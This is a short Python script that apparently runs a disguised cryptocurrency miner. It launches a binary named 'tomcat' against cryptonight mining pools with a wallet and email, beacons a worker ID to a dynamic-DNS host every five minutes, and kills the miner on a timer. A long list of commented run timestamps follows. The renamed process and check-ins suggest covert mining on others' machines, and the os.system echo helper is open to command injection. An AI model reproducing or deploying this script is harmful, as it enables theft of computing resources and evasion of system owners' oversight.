import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:02.020977
#2018-02-17 16:39:04.037880
#2018-02-17 18:27:03.706325
#2018-02-17 20:16:03.546820
#2018-02-17 22:03:04.929723
#2018-02-17 23:46:07.276839
#2018-02-18 01:34:06.134568
#2018-02-18 03:21:05.365255
#2018-02-18 05:09:03.712855
#2018-02-18 07:01:07.689683
#2018-02-18 08:50:01.273081
#2018-02-18 10:37:04.419700
#2018-02-18 12:22:07.308627
#2018-02-18 14:09:06.503435
#2018-02-18 15:59:03.626055
#2018-02-18 17:48:07.125284
#2018-02-18 19:35:02.056207
#2018-02-18 21:20:02.236927
#2018-02-18 23:08:04.110129
#2018-02-19 00:55:08.916113
#2018-02-19 02:42:06.025744
#2018-02-19 04:28:07.432058
#2018-02-19 06:13:02.019516
#2018-02-19 07:59:01.327254
#2018-02-19 09:50:05.444347
#2018-02-19 11:39:07.749718
#2018-02-19 13:26:07.206044
#2018-02-19 15:14:07.440549
#2018-02-19 17:03:06.603375
#2018-02-19 18:48:07.451614
#2018-02-19 20:41:02.172544
#2018-02-19 22:27:05.256041
#2018-02-20 00:13:03.540874
#2018-02-20 01:59:07.603768
#2018-02-20 03:49:06.151644
#2018-02-20 05:34:01.284820
#2018-02-20 07:18:06.775420
#2018-02-20 09:05:08.369265
#2018-02-20 10:48:07.143440
#2018-02-20 12:35:05.116511
#2018-02-20 14:20:06.358255
#2018-02-20 16:06:08.346396
#2018-02-20 17:51:08.175817
#2018-02-20 19:42:06.673841
#2018-02-20 21:28:06.810946
#2018-02-20 23:12:03.548379
#2018-02-21 00:56:07.655919
#2018-02-21 02:43:01.957114
#2018-02-21 04:33:03.790354
#2018-02-21 06:21:04.047106
#2018-02-21 08:06:08.107409
#2018-02-21 09:52:04.258701
#2018-02-21 11:40:08.258837
#2018-02-21 13:29:09.229454
#2018-02-21 15:14:09.933749
#2018-02-21 17:03:13.304361
#2018-02-21 18:50:08.887249
#2018-02-21 20:38:08.151010
#2018-02-21 22:25:05.334095
#2018-02-22 00:14:04.466624
#2018-02-22 02:01:06.834445
#2018-02-22 03:47:07.142553
#2018-02-22 05:34:02.112762
#2018-02-22 07:19:06.167379
#2018-02-22 09:06:08.844005
#2018-02-22 10:54:01.646865
#2018-02-22 12:39:09.054363
#2018-02-22 14:23:04.583333
#2018-02-22 16:10:07.063708
#2018-02-22 17:57:01.887470
#2018-02-22 19:44:07.741164
#2018-02-22 21:34:10.136544
#2018-02-22 23:21:05.785067
#2018-02-23 01:07:06.449885
#2018-02-23 02:54:04.259461
#2018-02-23 04:34:04.056371
#2018-02-23 06:19:06.920081
#2018-02-23 08:09:04.308141
#2018-02-23 10:24:07.151312
#2018-02-23 12:18:04.075442
#2018-02-23 14:06:09.263294
#2018-02-23 15:56:08.800931
#2018-02-23 17:43:05.681122
#2018-02-23 19:31:07.985691
#2018-02-23 21:14:08.505686
#2018-02-23 23:02:01.636056
#2018-02-24 00:47:02.210676
#2018-02-24 02:37:05.623385
#2018-02-24 04:31:01.885282
#2018-02-24 06:15:09.464299
#2018-02-24 08:03:05.028542
#2018-02-24 09:47:07.278859
#2018-02-24 11:42:05.958125
#2018-02-24 13:34:01.912746
#2018-02-24 15:21:01.382776
#2018-02-24 17:10:09.250591
#2018-02-24 19:02:06.123637
#2018-02-24 20:49:06.331059
#2018-02-24 23:07:04.623677
#2018-02-25 03:14:04.356132
#2018-02-25 06:03:06.333052
#2018-02-25 10:33:02.075016
#2018-02-25 12:05:03.143046
#2018-02-25 14:18:02.179507
#2018-02-25 15:53:01.715841